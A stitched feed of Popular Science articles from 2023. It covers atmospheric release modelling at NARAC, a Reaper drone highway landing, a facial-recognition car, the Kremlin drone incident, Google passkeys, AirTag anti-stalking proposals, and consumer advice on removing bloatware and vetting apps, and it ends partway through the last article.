To that end, NARAC has made publicly available examples of its briefing products, outlining what an emergency manager could expect to see in its one to two pages about dirty bombs, nuclear detonations, nuclear power plant accidents, hazardous chemicals, and biological agents.

The sim of all fears

Recently, the team has been assisting with radioactive worries in Ukraine, where Russia has interfered with the running of nuclear power plants. It also previously kept an analytical eye on the 2020 fires in Chernobyl’s exclusion zone and the same year’s launch of the Mars Perseverance rover. The rover had a plutonium power source, and NARAC was on hand to simulate what would happen in the event of an explosive accident. Going farther back, the team mobilized for weeks on end during the partial meltdown of the Fukushima reactors in Japan in 2011. 

But one of the events Glascoe is most proud of happened in late 2017, when sensors in Europe started picking up rogue radioactive activity. Across the continent, instruments designed to detect elemental decay saw spikes indicating ruthenium-106, with more than 300 total detections. “We were activated to try and figure out, ‘Well, what’s going on? Where did this come from?’” says Glascoe. 

As NARAC started its analysis, Glascoe remembered an internal research project involving the use of measurement data, atmospheric transport models, statistical methods, and machine learning that he thought might be helpful in tracing the radioactivity backward, rather than making the more standard forward prediction. “As the data comes in, the modeling gets adjusted to try and identify where likely sources are,” says Glascoe. 

Like the prototype that DOE had called up for use with Three Mile Island, this one wasn’t quite ready, but Glascoe called headquarters for permission anyway. “I said, ‘Hey, I know we haven’t really kicked the tires too much on this thing, except they did conclude this project and it looks like it works.’” They agreed to let him try it. 

Four days and many supercomputer cycles later, the team produced a map of probable release regions. The bull’s-eye was on a region with an industrial center. “And sure enough, a release from that location would do the trick,” says Glascoe. 

The suspect spot was in Russia, and many now believe the radioactivity came from the Mayak nuclear facility, which processes spent nuclear fuel. Mayak is located in a “closed city,” one that tightly controls who goes in and out. 

Ultimately, no one can stop the atmosphere’s churn, or its tendency to push particles around. The winds don’t care about borders or permits. And NARAC is there to scrutinize, even if it can’t stop, that movement.

Read more PopSci+ stories.

The post Inside the little-known group that knows where toxic clouds will blow appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Watch a giant military drone land on a Wyoming highway https://www.popsci.com/technology/reaper-drone-lands-highway-wyoming/ Tue, 09 May 2023 21:27:58 +0000 https://www.popsci.com/?p=540131
The Reaper on April 30.
The Reaper on April 30. Phil Speck / US Air National Guard

The MQ-9 Reaper boasts a wingspan of 66 feet and landed on Highway 287 on April 30. Here's why.

The post Watch a giant military drone land on a Wyoming highway appeared first on Popular Science.

]]>
The Reaper on April 30.
The Reaper on April 30. Phil Speck / US Air National Guard

On April 30, an MQ-9 Reaper drone landed on Highway 287, north of Rawlins, Wyoming. The landing was planned; it was a part of Exercise Agile Chariot, which drew a range of aircraft and saw ground support provided by the Kentucky Air National Guard. While US aircraft have landed on highways before, this was the first time such a landing had been undertaken by a Reaper, and it demonstrates the continued viability of adapting roads into runways as the need arises. 

In a video showing the landing released by the Air Force, the Reaper’s slow approach is visible against the snow-streaked rolling hills and pale-blue sky of Wyoming in spring. The landing zone is inconspicuous, a stretch of highway that could be anywhere, except for the assembled crowds and vehicles marking this particular stretch of road as an impromptu staging ground for air operations. 

“The MQ-9 can now operate around the world via satellite launch and recovery without traditional launch and recovery landing sites and maintenance packages,” said Lt. Col. Brian Flanigan, 2nd Special Operations Squadron director of operations, in a release. “Agile Chariot showed once again the leash is off the MQ-9 as the mission transitions to global strategic competition.”

When Flanigan describes the Reaper as transitioning to “global strategic competition,” that’s alluding to the comparatively narrower role Reapers had over the last 15 years, in which they were a tool used almost exclusively for the counter-insurgency warfare engaged in by the United States over Iraq and Afghanistan, as well as elsewhere, like Somalia and Yemen. Reapers’ advantages shine in counter-insurgency: The drones can fly high over long periods of time, watch in precise detail and detect small movements below, and drone pilots can pick targets as the opportunity arises.

The Reaper on Highway 287 in Wyoming, before take-off.
The Reaper on Highway 287 in Wyoming, before take-off. Phil Speck / US Air National Guard

But Reapers have hard limits that make their future uncertain in wars against militaries with substantial anti-air weapons, to say nothing of flying against fighter jets. Reapers are slow, propeller-driven planes, built for endurance not speed, and could be picked out of the sky or, worse, destroyed on a runway by a skilled enemy with dedicated anti-plane weaponry.

In March, a Reaper flying over the Black Sea was sprayed by fuel released from a Russian jet, an incident that led it to crash. While Wyoming’s Highway 287 is dangerous for cars, for planes it has the virtue of being entirely in friendly air space. 

Putting a Reaper into action in a war against a larger military, which in Pentagon terms often means against Russia or China, means finding a way to make the Reaper useful despite those threats. Such a mission would have to take advantage of the Reaper’s long endurance flight time, surveillance tools, and precision strike abilities, without leaving it overly vulnerable to attack. Operating on highways as runways is one way to overcome that limit, letting the drone fly from whenever there is road. 

“An adversary that may be able to deny use of a military base or an airfield, is going to have a nearly impossible time trying to defend every single linear mile of roads. It’s just too much territory for them to cover and that gives us access in places and areas that they can’t possibly defend,” Lt. Col. Dave Meyer, Deputy Mission Commander for Exercise Agile Chariot, said in a release.

Alongside the Reaper, the exercise showcased MC-130Js, A-10 Warthogs, and MH-6M Little Bird helicopters. With soldiers first establishing landing zones along the highway, the exercise then demonstrated landing the C-130 cargo aircraft to use as a refueling and resupply point for the A-10s, which also operated from the highway. Having the ability to not just land on an existing road, but bring more fuel and spare ammunition to launch new missions from the same road, makes it hard for an adversary to permanently ground planes, as resupply is also air-mobile and can use the same improvised runways.

Part of the exercise took place on Highway 789, which forks off 287 between Lander and Riverton, as the setting for trial search and rescue missions. “On the second day of operations, they repeated the procedure of preparing a landing zone for an MC-130. Once the aircraft landed, the team boarded MH-6 Little Birds that had been offloaded from the cargo plane by Soldiers from the 160th Special Operations Aviation Regiment. The special tactics troops then performed combat search-and-rescue missions to find simulated injured pilots and extract them from the landing zone on Highway 789,” described the Kentucky Air National Guard, in a statement.

With simulated casualties on cleared roads, the Air Force rehearsed for the tragedy of future war. As volunteers outfitted in prosthetic injuries were transported back to the care and safety of landed transports, the highways in Wyoming were home to the full spectrum of simulated war from runways. Watch a video of the landing, below.

The post Watch a giant military drone land on a Wyoming highway appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
You can unlock this new EV with your face https://www.popsci.com/technology/genesis-gv60-facial-recognition/ Mon, 08 May 2023 22:00:00 +0000 https://www.popsci.com/?p=539829
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you.
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you. Kristin Shaw

We tested the Genesis GV60, which allows you to open and even start the car using facial recognition and a fingerprint.

The post You can unlock this new EV with your face appeared first on Popular Science.

]]>
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you.
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you. Kristin Shaw

If you have Face ID set up on your iPhone, you can unlock your device by showing it your visage instead of using a pin code or a thumb print. It’s a familiar aspect of smartphone tech for many of us, but what about using it to get in your vehicle?

The Genesis GV60 is the first car to feature this technology to unlock and enter the car, pairing it with your fingerprint to start it up.

How does it work? Here’s what we discovered.

The Genesis GV60 is a tech-laden EV

Officially announced in the fall of 2022, the GV60 is Genesis’ first dedicated all-electric vehicle. Genesis, for the uninitiated, is the luxury arm of Korea-based automaker Hyundai. 

Built on the new Electric-Global Modular Platform, the GV60 is equipped with two electric motors, and the result is an impressive ride. At the entry level, the GV60 Advanced gets 314 horsepower, and the higher-level Performance trim cranks out 429 horsepower. As a bonus, the Performance also includes a Boost button that can kick it up to 483 horsepower for 10 seconds; with that in play, the GV60 boasts a 0-to-60 mph time of less than four seconds.

The profile of this EV is handsome, especially in the look-at-me shade of São Paulo Lime. Inside, the EV is just as fetching as the exterior, with cool touches like the rotating gear shifter. As soon as the car starts up, a crystal orb rotates to reveal a notched shifter that looks and feels futuristic. Some might say it’s gimmicky, but it does have a wonderful ergonomic feel on the pads of the fingers.

The rotating gear selector.
The rotating gear selector. Kristin Shaw

Embedded in the glossy black trim of the B-pillar, which is the part of the frame between the front and rear doors, the facial recognition camera stands ready to let you into the car without a key. But first, you’ll need to set it up to recognize you and up to one other user, so the car can be accessed by a partner, family member, or friend. Genesis uses deep learning to power this feature, and if you’d like to learn more about artificial intelligence, read our explainer on AI.

The facial recognition setup process

You’ll need both sets of the vehicle’s smart keys (Genesis’ key fobs) in hand to set up Face Connect, Genesis’ moniker for its facial recognition setup. Place the keys in the car, start it up, and open the “setup” menu and choose “user profile.” From there, establish a password and choose “set facial recognition.” The car will prompt you to leave the car running and step out of it, leaving the door open. Gaze into the white circle until the animation stops and turns green, and the GV60 will play an audio prompt: “facial recognition set.” The system is intuitive, and I found that I could set it up the first time on my own just through the prompts. If you don’t get it right, the GV60 will let you know and the camera light will turn from white to red.

After the image, the GV60 needs your fingerprint. Basically, you’ll go through the same setup process, instead choosing “fingerprint identification” and the car will issue instructions. It will ask for several placements of your index finger inside the vehicle (the fingerprint area is a small circle between the volume and tuning roller buttons) to create a full profile.

Genesis GV60 facial recognition camera
The camera on the exterior of the Genesis GV60. Genesis

In tandem, these two biometrics (facial recognition and fingerprint) work together to first unlock and then start the car. Upon approach, touch the door handle and place your face near the camera and it will unlock; you can even leave the key in the car and lock it with this setup. I found it to be very easy to set up, and it registered my face on the first try. The only thing I forgot the first couple of times was that I first had to touch the door handle and then scan my face. I could see this being a terrific way to park and take a jog around the park or hit the beach without having to worry about how to secure a physical key. 

Interestingly, to delete a profile the car requires just one smart key instead of two.

Not everyone is a fan of this type of technology in general because of privacy concerns related to biometrics; Genesis says no biometric data is uploaded to the cloud, but is stored securely and heavily encrypted in the vehicle itself. If it is your cup of tea and you like the option to leave the physical keys behind, this is a unique way of getting into your car. 

The post You can unlock this new EV with your face appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Stunt or sinister: The Kremlin drone incident, unpacked https://www.popsci.com/technology/kremlin-drone-incident-analysis/ Sat, 06 May 2023 11:00:00 +0000 https://www.popsci.com/?p=539413
Drones photo

There is a long history of drones being used in eye-catching and even dangerous ways.

The post Stunt or sinister: The Kremlin drone incident, unpacked appeared first on Popular Science.

]]>
Drones photo

Early in the morning of May 3, local Moscow time, a pair of explosions occurred above the Kremlin. Videos of the incident appeared to show two small drones detonating—ultramodern tech lit up against the venerable citadel. The incident was exclusively the domain of Russian social media for half a day, before Russian President Vladimir Putin declared it a failed assassination attempt.

What actually happened in the night sky above the Russian capital? It is a task being pieced together in public and in secret. Open-source analysts, examining the information available in the public, have constructed a picture of the event and video release, forming a good starting point.

Writing at Radio Liberty, a US-government-funded Russian-language outlet, reporters Sergei Dobrynin and Mark Krutov point out that a video showing smoke above the Kremlin was published around 3:30 am local time on a Moscow Telegram channel. Twelve hours later, Putin released a statement on the attack, and then, write Dobrynin and Krutov, “several other videos of the night attack appeared, according to which Radio Liberty established that two drones actually exploded in the area of ​​​​the dome of the Senate Palace with an interval of about 16 minutes, arriving from opposite directions. The first caused a small fire on the roof of the building, the second exploded in the air.”

That the drones exploded outside a symbolic target, without reaching a practical one, could be by design, or it could owe to the nature of Kremlin air defense, which may have shot the drones down at the last moment before they became more threatening. 

Other investigations into the origin, nature, and means of the drone incident are likely being carried out behind the closed doors and covert channels of intelligence services. Without being privy to those conversations, and aware that information released by governments is only a selective portion of what is collected, it’s possible to instead answer a different set of questions: could drones do this? And why would someone use a drone for an attack like this?

To answer both, it is important to understand gimmick drones.

What’s a gimmick drone?

Drones, especially the models able to carry a small payload and fly long enough to travel a practical distance, can be useful tools for a variety of real functions. Those can include real-estate photography, crop surveying, creating videos, and even carrying small explosives in war. But drones can also carry less-useful payloads, and be used as a way to advertise something other than the drone itself, like coffee delivery, beer vending, or returning shirts from a dry cleaner. For a certain part of the 2010s, attaching a product to a drone video was a good way to get the media to write about it. 

What stands out about gimmick drones is not that they were doing something only a drone could do, but instead that the people behind the stunt were using a drone as a publicity technique for something else. In 2018, a commercial drone was allegedly used in an assassination attempt against Venezuelan president Nicolás Maduro, in which drones flew at Maduro and then exploded in the sky, away from people and without reports of injury. 

As I noted at the time about gimmick drones, “In every case, the drone is the entry point to a sales pitch about something else, a prelude to an ad for sunblock or holiday specials at a casual restaurant. The drone was always part of the theater, a robotic pitchman, an unmanned MC. What mattered was the spectacle, the hook, to get people to listen to whatever was said afterwards.”

Drones are a hard weapon to use for precision assassination. Compared to firearms, poisoning, explosives in cars or buildings, or a host of other attacks, drones represent a clumsy and difficult method. Wind can blow the drones off course, they can be intercepted before they get close, and the flight time of a commercial drone laden with explosives is in minutes, not hours.

What a drone can do, though, is explode in a high-profile manner.

Why fly explosive-laden drones at the  Kremlin?

Without knowing the exact type of drone or the motives of the drone operator (or operators), it is hard to say exactly why one was flown at and blown up above one of Russia’s most iconic edifices of state power. Russia’s government initially blamed Ukraine, before moving on to attribute the attack to the United States. The United States denied involvement in the attack, and US Secretary of State Anthony Blinken said to take any Russian claims with “a very large shaker of salt.”

Asked about the news, Ukraine’s President Zelensky said the country fights Russia on its own territory, not through direct attacks on Putin or Moscow. The war has seen successful attacks on Putin-aligned figures and war proponents in Russia, as well as the family of Putin allies, though attribution for these attacks remains at least somewhat contested, with the United States attributing at least one of them to Ukrainian efforts.

Some war commentators in the US have floated the possibility that the attack was staged by Russia against Russia, as a way to rally support for the government’s invasion. However, that would demonstrate that Russian air defenses and security services are inept enough to miss two explosive-laden drones flying over the capital and would be an unusual way to argue that the country is powerful and strong. 

Ultimately, the drone attackers may have not conducted this operation to achieve any direct kill or material victory, but as a proof of concept, showing that such attacks are possible. It would also show that claims of inviolability of Russian airspace are, at least for small enough flying machines and covert enough operatives, a myth. 

In that sense, the May 3 drone incident has a lot in common with the May 1987 flight of Mathias Rust, an amateur pilot in Germany who safely flew a private plane into Moscow and landed it in Red Square, right near the Kremlin. Rust’s flight ended without bloodshed or explosions, and took place in a peacetime environment, but it demonstrated the hollowness of the fortress state whose skies he flew through.

The post Stunt or sinister: The Kremlin drone incident, unpacked appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Ditch your Google password and set up a passkey instead https://www.popsci.com/diy/google-passkey-setup/ Fri, 05 May 2023 16:00:00 +0000 https://www.popsci.com/?p=539294
Laptop with google account screen showing how to set up passkeys
Enable passkeys and you'll be glad you forgot your password. Austin Distel / Unsplash

The big G now provides a passwordless alternative to access your data.

The post Ditch your Google password and set up a passkey instead appeared first on Popular Science.

]]>
Laptop with google account screen showing how to set up passkeys
Enable passkeys and you'll be glad you forgot your password. Austin Distel / Unsplash

Password haters across the land—rejoice. Following the efforts of Apple and Microsoft, Google is now a step closer to being password-free after making passkeys available to all individual account users

Of course, having the option doesn’t matter if you’re not sure what to do with it. Google’s new feature allows you to sign into your account from your devices with only a PIN or a biometric, like your face or fingerprint, so you can forget your ever-inconvenient password once and for all. If that sounds great to you, continue reading to activate passkeys for your Google account. 

How to set up a passkey for your Google account

Remember that at the moment, passkeys are only available for individual users, so you won’t find them on any Google Workspace account. To see what all the fuss is about, go to your Google Account page, look to the left-hand sidebar, and go to Security.

Under How to sign in to Google, click on Passkeys, and provide your password before you make any changes—this may be the last time you use it. On the next screen, you’ll notice a blue button that says Start with passkeys. Click on it and you’re done: Google will create the necessary passkeys and automatically save your private one to your device. The next time you log in, you’ll need to provide one of the authentication methods you’ve already set up for your computer or phone: your face, your fingerprint, or a personal identification number (PIN). 

[Related: How to secure your Google account]

If you have Android devices signed into your account, you’ll see them listed on the passkey menu as well. Google will automatically create those passkeys for you, so you’ll be able to seamlessly access your information on those devices. 

You can also use passkeys as backups to authenticate a login on another computer or smartphone. If you’re signing into your account on a borrowed laptop, for example, you can validate that new session by choosing your phone from the list that pops up when you choose passkeys as your authentication method. Then just follow the prompts on your phone, and you’ll be good to go. 

Now, a word of caution

In general, your Google passkey should work smoothly, but you may experience some hiccups as tech companies adapt to this relatively new form of security. Passkeys use a standard called WebAuthentication that creates a set of two related keys: one stays in the hands of the service you’re trying to log into (in this case, Google), while the other, a private one, is stored locally on your device. 

The dual nature of a passkey makes this sign-in method extremely secure because the service never sees your private key—it just needs to know you have it. But if you have multiple devices running different operating systems, the fact that your piece of the passkey puzzle lives locally can cause some issues.

Apple-exclusive environments have it easy. The Cupertino company syncs users’ passkeys using the iCloud keychain, so your private keys will all live simultaneously on your MacBook, iPhone, and iPad, as long as you’re signed into the same iCloud account. Add a Windows computer or an Android phone to the mix and things start to get messy—you may need to use a second device to verify your identity. This is when the backup devices mentioned above may come in handy. 

[Related: Keep your online accounts safe by logging out today]

The hope is that eventually, integration between operating systems will be complete and you’ll be able to log into all of your accounts no matter the make and OS of your device. In the meantime, you can try passkeys out and see if they’re right for you. Worst-case scenario, you set them aside and instead outsource the task of remembering your credentials to a password manager.

The post Ditch your Google password and set up a passkey instead appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Google joins the fight against passwords by enabling passkeys https://www.popsci.com/technology/google-enables-passkeys/ Fri, 05 May 2023 14:00:42 +0000 https://www.popsci.com/?p=539269
Internet photo

It's still early days for passkeys, so expect some speed bumps if you want to be an early adopter.

The post Google joins the fight against passwords by enabling passkeys appeared first on Popular Science.

]]>
Internet photo

The passwordless future is slowly becoming a reality. This week, Google announced that you can now log into your Google account with just a passkey. It’s a huge milestone in what promises to be the incredibly long, awkward move away from using passwords for security. 

In case you haven’t heard yet, passwords are terrible. People pick awful passwords to begin with, find them really hard to remember, and then don’t even use them properly. When someone gets hacked, that may just involve someone using (or reusing) a really bad password or accidentally giving it to a scammer. To try to solve these difficult problems, an industry group—including Apple, Google, and Microsoft—called the FIDO Alliance developed a system called passkeys. 

Passkeys are built using what’s called the WebAuthentication (or WebAuthn) standard and public-key cryptography. It’s similar to how end-to-end encrypted messaging apps work. Instead of you creating a password, your device generates a unique pair of mathematically related keys. One of them, the public key, is stored by the service on its server. The other, the private key, is kept securely on your device, ideally locked behind your biometric data (like your fingerprint or face scan), though the system also supports PINs. 

[Related: Microsoft is letting you ditch passwords. Here’s how.]

Because the keys are mathematically related, the website or app can get your device to verify that you have the matching private key and issue a one-time login without ever actually knowing what your private key is. This means that account details can’t be stolen or phished and, since you don’t have to remember anything, logging in is simple. 

Take Google’s recent implementation. Once you’ve set up a passkey, you will be able to log into your Google account just by entering your email address and scanning your fingerprint or face. It feels similar to how built-in password managers work, though without any password in the mix. 

Of course, passkeys are still a work in progress, and implementations are inconsistent. As ArsTechnica points out, passkeys currently sync using your operating system ecosystem. Right now, if you exclusively use Apple devices, things are pretty okay. Your passkeys will sync between your iPhone, iPad, and Mac using iCloud. For everyone else though, they’re a mess. If you create a passkey on your Android smartphone, it will sync to your other Android devices, but not your Windows computer or even your Chrome browser. There are workarounds using tools like QR codes, but it’s a far cry from the easy password-sharing built into most browsers.

[Related: Apple’s passkeys could be better than passwords. Here’s how they’ll work.]

Also, passkeys aren’t very widely supported yet. Different operating systems support them to various degrees and there currently are just 41 apps and services that allow you to use them to login. Google joining the list is a huge deal, in part because of how many services rely on Sign In With Google.

Password managers have become a good tool for managing complex, unique passwords across different devices and operating systems. These same password managers, like Dashlane and 1Password, are working to solve the syncing issues currently baked into passkeys. In a statement to PopSci, 1Password CEO Jeff Shiner said, “Passkeys are the first authentication method that removes human error—delivering security and ease of use… In order to be widely adopted though, users need the ability to choose where and when they want to use passkeys so they can easily switch between ecosystems… This is a tipping point for passkeys and making the online world safe.”

If you’re ready to try passkeys despite the sync issues and lack of support, you can read our guide on how to set up a passkey for your Google account right now. Unfortunately, this only works with regular Google accounts. Google Workspace accounts aren’t supported just yet. 

The post Google joins the fight against passwords by enabling passkeys appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Tech giants have a plan to fight dangerous AirTag stalking https://www.popsci.com/technology/apple-google-airtag-tracker-stalking/ Thu, 04 May 2023 20:30:00 +0000 https://www.popsci.com/?p=539115
AirTags and other trackers like them use Bluetooth to help people find a lost item.
AirTags and other trackers like them use Bluetooth to help people find a lost item. Apple

A new proposal from Apple and Google could help solve a serious problem with Bluetooth trackers.

The post Tech giants have a plan to fight dangerous AirTag stalking appeared first on Popular Science.

]]>
AirTags and other trackers like them use Bluetooth to help people find a lost item.
AirTags and other trackers like them use Bluetooth to help people find a lost item. Apple

Apple and Google have jointly proposed a new industry specification aimed at preventing the misuse of Bluetooth location-tracking devices like AirTags. The new proposal outlines a number of best practices for makers of Bluetooth trackers and, if adopted, would enable anyone with an iOS or Android smartphone to get a notification if they were the target of unauthorized tracking.

Since launching in 2021, Apple’s AirTags have been controversial. The coin-sized Bluetooth devices work using Apple’s Find My network, which is also used to track the location of iPhones, iPads, MacBooks, and other Apple devices. In essence, every Apple device works as a receiver and reports the location of any other nearby device back to Apple; this means that you can still track devices that don’t have GPS or even cellular data. Everything is end-to-end encrypted so only the authorized device owner can see where something is, but that hasn’t stopped AirTags being misused.

While a small location-tracking device with a long battery life that clips to your keys or fits in your bag has some very obvious benefits, they have also been called “a gift for stalkers.” If you can put an AirTag in your coat pocket or handbag, so can someone else. Similarly, it’s easy to find stories of abusive partners using AirTags to track their victims, or thieves using them to track valuable cars.

However, for all the negatives, a lot of people recognize that Bluetooth trackers can be incredibly useful. Just this week, the New York Police Department (NYPD) and Mayor Eric Adams announced that they were encouraging car-owning New Yorkers to leave an AirTag in their cars and said that they would be giving 500 away for free. “AirTags in your car will help us recover your vehicle if it’s stolen,” said NYPD Chief of Department Jeffrey Maddrey on Twitter. “Help us help you, get an AirTag.” 

Similarly, there are lots of stories of people using AirTags to get their lost (or stolen) luggage back, find dogs missing in storm drains, and, as the NYPD suggests, recover stolen cars

The newly proposed industry specification represents a big step toward limiting the potential for abuse from AirTags and other location-tracking Bluetooth devices. At the moment, unwanted tracking notifications are an absolute mess. 

Already, iPhone users get a notification if their phone detects an unknown AirTag moving with them—which is likely why there are a lot more news stories of people finding AirTags than other Bluetooth location-tracking devices. They also get a notification if some other Bluetooth location-tracking devices that support the Find My network are found nearby, like eufy SmartTrack devices. However, to find Tile devices, iPhone users have to use an app to scan for them, something they’re only likely to do if they suspect they’re being tracked, or wait for the Tile device to beep after it’s been separated from its owner for three days. 

Things are worse for Android users. They have to use the Tracker Detect app to find nearby AirTags and other Find My compatible devices. They also have to use an app to scan for Tile trackers, or wait for them to beep.

If the new specifications are adopted, a Bluetooth location-tracking device that’s separated from its owner—and possibly being used to stalk someone—would automatically alert nearby users of any smartphone platform that they are possibly a target of unwanted tracking, and they would then be able to find and disable the tracker in question. There’d be no need for anyone to use an app to scan for trackers or wait to hear a beep.

In a statement on Apple’s website, Ron Huang, Apple’s vice president of sensing and connectivity, says, “We built AirTag and the Find My network with a set of proactive features to discourage unwanted tracking—a first in the industry—and we continue to make improvements to help ensure the technology is being used as intended. This new industry specification builds upon the AirTag protections, and through collaboration with Google results in a critical step forward to help combat unwanted tracking across iOS and Android.”

And things look promising. Samsung, Tile, Chipolo, eufy Security, and Pebblebee, who all make similar tracking devices, have indicated their support for the promised specifications. There will now be a three-month comment period where interested parties can submit feedback. After that, Apple and Google will work together to implement unwanted tracking alerts into future iOS and Android releases. 

The post Tech giants have a plan to fight dangerous AirTag stalking appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Make sure your computer isn’t downloading stuff you don’t want https://www.popsci.com/stop-laptop-installing-software/ Sun, 01 Aug 2021 11:00:00 +0000 https://www.popsci.com/uncategorized/stop-laptop-installing-software/
A person using a white MacBook laptop on a white table, maybe figuring out how to remove bloatware.
Take control over what gets installed on your laptop. Tyler Franta / Unsplash

Don't compromise the security of your system or the safety of your data.

The post Make sure your computer isn’t downloading stuff you don’t want appeared first on Popular Science.

]]>
A person using a white MacBook laptop on a white table, maybe figuring out how to remove bloatware.
Take control over what gets installed on your laptop. Tyler Franta / Unsplash

The fewer applications you’ve got on your laptop or desktop, the better—it means more room for the apps you actually use, less strain on your computer, and fewer potential security holes to worry about.

Taking some time to remove bloatware—pre-installed programs you don’t want on your device—is only the first step. After that’s done, it’s important to ensure your computer doesn’t get cluttered up with unwanted software in the future. Once these two tasks are completed, you should find your cleaner, more lightweight operating system runs a whole lot smoother.

Banish the bloatware

A list of Windows 10 apps inside the operating system's apps and features menu, some of which may be bloatware.
Figuring out how to remove bloatware on Windows 10 is as easy as finding the program and clicking a button. David Nield for Popular Science

Your shiny new laptop might already be weighed down by unnecessary applications. These are called bloatware, and to expand on the brief definition we offered above, they’re basically the laptop manufacturer’s attempts to push its own services. Some can be useful, but you don’t have to keep them around if you don’t want to.

On Windows, click the Settings cog icon on the Start menu, then choose Apps. Next, click Installed apps (Windows 11) or Apps & features (Windows 10) to see a list of all the applications on your system. Removal is easy: on Windows 11 click the three dots to the right of an app’s name and pick Uninstall; on Windows 10 just select any one and hit Uninstall. Most programs can be erased this way, though some can’t be removed.

Bloatware is less of a problem on macOS devices, but you might not want to keep all of the programs Apple includes. You’ve got a few different options when it comes to uninstalling programs from macOS.

You could open up the Applications folder in Finder, and then drag the app icon down to Trash to remove it from your system. Alternatively, open Launchpad from the Dock or the Applications folder, click and hold on an app icon until it starts shaking, then tap the little X icon that appears on it.

Be careful with installers

The setup process in the installer for CCleaner Business Edition.
Tread carefully through software installation routines. David Nield for Popular Science

Plenty of programs will attempt to install extra software while you’re working your way through the initial setup process. Not only will this add extra clutter to your system, it can also be risky from a security perspective—you’re granting access to apps you haven’t fully vetted.

The only way to really guard against this is to pay attention as you install new software, and don’t zone out while clicking the “next” buttons until you’ve reached the end. Watch out for boxes that are checked by default and effectively give permission for the program to install extra software.

[Related: Questions to ask when you’re trying to decide on a new app or service]

You should also be careful about the software developers you trust to install applications on your laptop. There are many honest and reputable smaller developers out there, but always do diligent research before downloading and installing something new: check the history of the developer, and read reviews of the app from existing users.

To be on the safe side, limit yourself to installing apps from the official Microsoft and Apple stores whenever possible—these programs have been vetted, and shouldn’t attempt to install anything extra. On Windows, choose Microsoft Store from the Start menu; on macOS, click the App Store icon in the Dock.

Lock down your browser

The installation process for Dropbox for Gmail extension in a Google Chrome browser.
Check the permissions given to extensions in your browser. David Nield for Popular Science

Your browser is your laptop’s window to the web, so you’ll want to make sure it’s shored up against apps and extensions that surreptitiously install themselves. Keeping your browser updated is the first step, but thankfully modern browsers take care of that automatically (so long as you close all your tabs and restart the browser every once in a while).

Avoid agreeing to install any add-ons or plug-ins you don’t immediately recognize as programs you opted to download. If you’re in any doubt, navigate away from the page you’re on or close the tab.

Watch out for extra toolbars appearing in your browser, or browser settings (like the default search engine) changing without warning—you can always head to the extensions settings page in your browser to remove add-ons you’re not sure about.

When you install a new extension in your browser, you’ll get a pop-up explaining the permissions it has—the data it can see, and the changes it can make to your system. Don’t install any extras on top of your browser without double-checking the developers behind them and reading reviews left by current users.

Practice good security

The app and browser control settings screen on Windows 10, for security.
Windows has a built-in feature guarding against unwanted installations. David Nield for Popular Science

To maximize your protection against applications that would install themselves without your permission, we recommend installing an antivirus package whether you’re on Windows or macOS—you can find a variety of independent reports online to point you towards the best choices. These packages typically include dedicated tools that watch for unexpected software installations.

If you’re on Windows, you can make use of the built-in Windows Defender software that comes with the operating system and specifically checks for the installation of authorized apps. On Windows 11, open Settings, click Privacy & security, then Windows Security, Open Windows Security, and App & browser control to make sure the feature is enabled. If you’re still using Windows 10, open Settings, then click Update & Security, Windows Security, and App & browser control.

[Related: How to make sure no one is spying on your computer]

Be very careful when installing anything you’ve found on the web. Double-check you’re accessing it from a trusted website—in the case of Office 365, for example, download it straight from Microsoft rather than a third-party website. If you are downloading applications from the internet, make sure the file you’ve got matches what you thought you were getting.

The same goes for email attachments or links sent over social media—know the warning signs of phishing and other email-based attacks. If someone sends you something you weren’t expecting, whether it’s a document or a download, check the email address (the account may have your brother’s name, but if the email address is unfamiliar, step away) before opening anything.

This story has been updated. It was originally published on February 27, 2019.

The post Make sure your computer isn’t downloading stuff you don’t want appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Stop and ask these 5 security questions before installing any app https://www.popsci.com/diy/app-security-questions/ Tue, 02 May 2023 12:23:31 +0000 https://www.popsci.com/?p=538260
A person holding an iPhone with a number of apps on its home screen. We hope they asked these security questions before installing them.
Be selective about what goes on your phone or laptop. Onur Binay / Unsplash

These simple checks will help keep your devices safe from bad apps and bad actors.

The post Stop and ask these 5 security questions before installing any app appeared first on Popular Science.

]]>
A person holding an iPhone with a number of apps on its home screen. We hope they asked these security questions before installing them.
Be selective about what goes on your phone or laptop. Onur Binay / Unsplash

There’s a wealth of software available for Windows, macOS, Android, and iOS—but not all of it has been developed with the best intentions. There are apps out there that have been built to steal your data, corrupt your files, spy on your digital activities, and surreptitiously squeeze money out of you.

The good news is that a few smart questions can steer you away from the shady stuff and toward apps you can trust and rely on. If you’re not sure about a particular piece of software for your phone or computer, running through this simple checklist should help you spot the biggest red flags.

1. How old is the app?

Wherever you’re downloading an app from, there should be a mention of when it was last updated. On the Google Play Store on Android devices, for example, you can tap About this app on any listing to see when it was last updated, and what that update included. On iOS, tap Version History.

Old software that hasn’t been updated in the last year or so isn’t necessarily bad, but be wary of it: It’s less likely to work with the latest version of whatever operating system you’re on, and it’s more likely to have security vulnerabilities that can be exploited by bad actors (because it’s hasn’t been patched against the latest threats).

Don’t automatically trust brand new software either. An app may have been rushed out to cash in on a trend (whether it’s Wordle clones or ChatGPT extensions), and these types of apps are built to make money rather than offer a good user experience or respect your privacy. It may be worth just waiting until you’ve seen some reviews of the app in question.

The app info for an Android app on the Google Play store.
Look out for when the last app update was. David Nield for Popular Science

2. What are other people saying?

That brings us neatly to user reviews, which can be a handy way of gauging an app’s quality. It’s easy to use the dedicated reviews sections in official app stores to see what other people think of the software, but in other scenarios (like downloading a Windows program from the web) you can do a quick web search for the name of the app.

Be sure to check several reviews rather than just relying on one or two, and look for running themes over isolated incidents (the customer isn’t necessarily always right). See what users are saying about bugs and crashes, for example, and how any requests for support have been handled.

[Related: What to do when your apps keep crashing]

